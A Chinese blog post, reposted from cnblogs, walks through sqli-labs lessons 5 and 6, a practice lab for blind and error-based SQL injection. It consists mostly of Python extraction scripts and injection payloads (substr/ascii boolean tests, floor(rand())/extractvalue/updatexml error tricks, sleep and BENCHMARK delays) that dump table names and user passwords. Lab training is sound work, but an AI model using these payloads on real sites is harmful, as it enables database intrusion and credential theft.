當前位置:
首頁 >
sqli-labs:5-6,盲注
發(fā)布時間:2023/11/27
38
豆豆
生活随笔
收集整理的這篇文章主要介紹了
sqli-labs:5-6,盲注
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
思考1:當# --+都被過濾時,只能考慮閉合處理
思考2:union聯(lián)合注入時必須先判斷字段長度
eg. id=1' order by 3 and '1'='1?
sqli5:
首先判斷出對id經(jīng)過了'處理
其次發(fā)現(xiàn)結果不再回顯
ok那就盲注了,先判斷mysql版本,版本過低可優(yōu)先考慮dns邊信道攻擊。
bool盲注(and邏輯)的腳本(substr)
1 # -*- coding: utf-8 -*- 2 """ 3 Created on Sat Mar 23 16:03:43 2019 4 5 @author: kenshin 6 """ 7 8 import requests,re 9 url = 'http://localhost/sqli-labs/Less-5/?id=1' 10 pattern_mark = 'You are in...........' 11 12 def get_version(url): 13 #mysql版本標準:x.x.xx 14 #假設lstsion長度為5 15 lst = ['#' for x in range(0, 5)] 16 lst[1] = lst[3] = '.' 17 for i in (1,3,5,6): 18 for ii in range(48,58): 19 payload = "\' and ascii(substr((select version()),"+str(i)+",1))="+str(ii)+" --+" 20 url_new = url + payload 21 r = requests.get(url_new) 22 if(re.findall(pattern_mark,r.text)): 23 lst[i-1] = str(ii-48) 24 break 25 sr = ''.join(lst) 26 print("the lstsion of mysql:"+sr) 27 28 def get_user(url): 29 #假設user()長度為15 30 lst = ['#' for x in range(0,15)] 31 for i in range(1,16): 32 for ii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-@': 33 payload = "\' and substr((select user()),"+str(i)+",1)='"+ii+"' --+" 34 url_new = url + payload 35 r = requests.get(url_new) 36 if(re.findall(pattern_mark,r.text)): 37 lst[i-1] = ii 38 print(ii) 39 break 40 sr = ''.join(lst) 41 print("the user of database: "+sr) 42 43 def get_datadir(url): 44 #假設@@datadir長度為32 45 lst = ['#' for x in range(0,32)] 46 for i in range(1,33): 47 for ii in ':\\qwertyuiopasdfghjklzxcvbnm1234567890_-': 48 payload = "\' and substr((select @@datadir),"+str(i)+",1)='"+ii+"' --+" 49 url_new = url + payload 50 r = requests.get(url_new) 51 if(re.findall(pattern_mark,r.text)): 52 lst[i-1] = ii 53 print(ii) 54 break 55 sr = ''.join(lst) 56 print(sr) 57 58 def get_currTB(url): 59 #假設當前數(shù)據(jù)庫最多有10個表[i標識] 60 for i in range(0,10): 61 #假設最長的表名長度為10[ii標識] 62 lst = ['#' for x in range(0,10)] 63 for ii in range(1,11): 64 for iii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-#': 65 payload = "\' and substr((select * from information_schema.tables where table_schema=database() limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+" 66 url_new = url + payload 67 r = requests.get(url_new) 68 if(re.findall(pattern_mark,r.text)): 69 lst[ii-1] = iii 70 print(iii) 71 break 72 if(lst[ii-1] == '#'): 73 break 74 sr = ''.join(lst) 75 print(sr) 76 77 def get_Column(url,tb): 78 #假設當前列最多有3個字段[i標識] 79 for i in range(0,3): 80 #假設每個字段最長的數(shù)據(jù)長度為10 81 lst = ['#' for x in range(0,10)] 82 for ii in range(1,11): 83 for iii in '@qwertyuiopasdfghjklzxcvbnm1234567890_-#': 84 payload = "\' and substr((select column_name from information_schema.columns where table_name='"+tb+"' limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+" 85 url_new = url + payload 86 r = requests.get(url_new) 87 if(re.findall(pattern_mark,r.text)): 88 lst[ii-1] = iii 89 print(iii) 90 break 91 if(lst[ii-1] == '#'): 92 break 93 sr = ''.join(lst) 94 print(sr) 95 def get_data(url): 96 #假設當前列有10條數(shù)據(jù)[i標識] 97 for i in range(1,11): 98 #假設每條數(shù)據(jù)最長的數(shù)據(jù)長度為25 99 lst = ['#' for x in range(0,25)] 100 for ii in range(1,26): 101 for iii in '%@qwertyuiopasdfghjklzxcvbnm1234567890_-#': 102 #變量太多,payload一些變量在代碼端自行設置TT 103 payload = "' and substr((select group_concat(id,'%',username,'%',password) from security.users where id="+str(i)+"),"+str(ii)+",1)='"+str(iii)+"' --+" 104 url_new = url + payload 105 r = requests.get(url_new) 106 if(re.findall(pattern_mark,r.text)): 107 lst[ii-1] = iii 108 print(iii) 109 break 110 if(lst[ii-1] == '#'): 111 break 112 sr = ''.join(lst) 113 print(sr) 114 """ 115 dnslog 116 """ 117 118 119 #get_lstsion(url) 120 #get_user(url) 121 #get_datadir(url) 122 #get_currTB(url) 123 #tb = input("select table >> ") 124 #get_Column(url,tb) 125 get_data(url)v1 bool型盲注腳本
# -*- coding: utf-8 -*- """ Created on Sat Mar 23 16:03:43 2019@author: kenshin """ import requests,re,time,sys url = 'http://localhost/sqli-labs/Less-5/?id=1' pattern_mark = 'You are in...........'def view_bar(num,total):rate = num / totalrate_num = int(rate * 100)r = '\r[%d%%]%s>' % (rate_num,'='*num)sys.stdout.write(r)sys.stdout.flush()def get_version(url):#mysql版本標準:x.x.xx#假設lstsion長度為5lst = ['#' for x in range(0, 6)]lst[1] = lst[3] = '.'for i in (1,3,5,6):view_bar(i,6)for ii in range(48,58):payload = "\' and ascii(substr((select version()),"+str(i)+",1))="+str(ii)+" --+"url_new = url + payloadr = requests.get(url_new)if(re.findall(pattern_mark,r.text)):lst[i-1] = str(ii-48)breaksr = ''.join(lst)print("\nthe version of mysql:"+sr)def get_user(url):#假設user()長度為15lst = ['#' for x in range(0,15)]for i in range(1,16):view_bar(i,15)for ii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-@':payload = "\' and substr((select user()),"+str(i)+",1)='"+ii+"' --+"url_new = url + payloadr = requests.get(url_new)if(re.findall(pattern_mark,r.text)):lst[i-1] = iibreaksr = ''.join(lst)print("\n the user of database: "+sr)def get_datadir(url):#假設@@datadir長度為32lst = ['#' for x in range(0,32)]for i in range(1,33):view_bar(i,32)for ii in ':\\qwertyuiopasdfghjklzxcvbnm1234567890_-':payload = "\' and substr((select @@datadir),"+str(i)+",1)='"+ii+"' --+"url_new = url + payloadr = requests.get(url_new)if(re.findall(pattern_mark,r.text)):lst[i-1] = iibreaksr = ''.join(lst)print(sr)time_end=time.time()print("\ntotally cost: "+str(time_end-time_start) + "s")def get_currTB(url):#假設當前數(shù)據(jù)庫最多有10個表[i標識]for i in range(0,4):view_bar(i,3)#假設最長的表名長度為10[ii標識]lst = ['#' for x in range(0,10)]for ii in range(1,11): for iii in 'qwertyuiopasdfghjklzxcvbnm1234567890_-#':payload = "\' and substr((select table_name from information_schema.tables where table_schema=database() limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+"url_new = url + payloadr = requests.get(url_new)if(re.findall(pattern_mark,r.text)):lst[ii-1] = iiibreakif(lst[ii-1] == '#'):breaksr = ''.join(lst)print("\n"+sr)def get_Column(url,tb):#假設當前列最多有3個字段[i標識]for i in range(0,3):view_bar(i,2)#假設每個字段最長的數(shù)據(jù)長度為10lst = ['#' for x in range(0,10)]for ii in range(1,11):for iii in '@qwertyuiopasdfghjklzxcvbnm1234567890_-#':payload = "\' and substr((select column_name from information_schema.columns where table_name='"+tb+"' limit "+str(i)+",1),"+str(ii)+",1)='"+str(iii)+"' --+"url_new = url + payloadr = requests.get(url_new)if(re.findall(pattern_mark,r.text)):lst[ii-1] = iiibreakif(lst[ii-1] == '#'):breaksr = ''.join(lst)print("\n"+sr) def get_data(url):time_start=time.time() #假設當前列有10條數(shù)據(jù)[i標識]for i in range(1,11):view_bar(i,10)#假設每條數(shù)據(jù)最長的數(shù)據(jù)長度為25lst = ['#' for x in range(0,25)]for ii in range(1,26):for iii in '%@qwertyuiopasdfghjklzxcvbnm1234567890_-#':#變量太多,payload一些變量在代碼端自行設置TTpayload = "' and substr((select group_concat(id,'%',username,'%',password) from security.users where id="+str(i)+"),"+str(ii)+",1)='"+str(iii)+"' --+"url_new = url + payloadr = requests.get(url_new)if(re.findall(pattern_mark,r.text)):lst[ii-1] = iiibreakif(lst[ii-1] == '#'):breaksr = ''.join(lst)print("\n"+sr)time_end=time.time()print("totally cost: "+str(time_end-time_start) + "s") """ dnslog """ #get_version(url) #get_user(url) #get_datadir(url) #get_currTB(url) #tb = input("select table >> ") #get_Column(url,tb) #get_data(url)v2 增加了進度條
?
?
?
環(huán)境均為mysql 5.5.3
(left)
' and left(version(),1)=5--+(php5.2版本可用,瞎報)
' and left(database(),1)=>'a'--+(php5+版本可用
(substr)
' and substr((select database() limit 0,1),1,1)>'z'--+(php5+版本可用)
(regexp)
' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username')--+(php5+版本可用)
(mid)
' and mid((SELECT IFNULL(CAST(username AS CHAR),0x20) FROM security.users ORDER BY id LIMIT 0,1),1,1)='d'--+(php5+版本可用)
補充:ascill和ord()可將字符轉換為ascill碼
?
sqli-6
對id經(jīng)過了"處理
floor(rand(0)*2)報錯(php 5+版本可用)
-1' union Select 1,count(*),concat(0x7e,(select user()),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>root@localhost
database()
@@datadir
...
-1' union select 1,count(*),concat(0x7e,(select schema_name from information_schema.schemata limit 4,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>security
-1' union select 1,count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>users
-1' union select 1,count(*),concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>password
-1' union select 1,count(*),concat(0x7e,(select password from security.users limit 0,1),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+
=>Dump
1 # -*- coding: utf-8 -*- 2 """ 3 Created on Sun Mar 24 09:56:20 2019 4 5 @author: kenshin 6 """ 7 8 import requests,re 9 url = 'http://localhost/sqli-labs/Less-5/?id=-1' 10 pattern_mark = '~(.+?)~' 11 12 def get_currDB(url): 13 payload = "\' union select 1,count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2))a from information_schema.columns group by a--+" 14 url += payload 15 r = requests.get(url) 16 rst=re.findall(pattern_mark,r.text) 17 print(rst) 18 19 get_currDB(url)腳本
xpath函數(shù)報錯
1' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) --+
=>5.5.53
?利用數(shù)據(jù)的重復性
-1' union select 1,2,3 from (select NAME_CONST(version(),1), NAME_CONST(version(),1))x --+
?...
updatexml
1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))--+
?
?
sleep延時注入
1' and If(substr(database(),1,1)='s',1,sleep(5))--+
BENCHMARK延時注入
1' UNION SELECT (IF(SUBSTRING(current,1,1)='s',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1--+ ?
轉載于:https://www.cnblogs.com/p0pl4r/p/10584953.html
總結
以上是生活随笔為你收集整理的sqli-labs:5-6,盲注的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: qq个性签名关于学习
- 下一篇: 还没有结束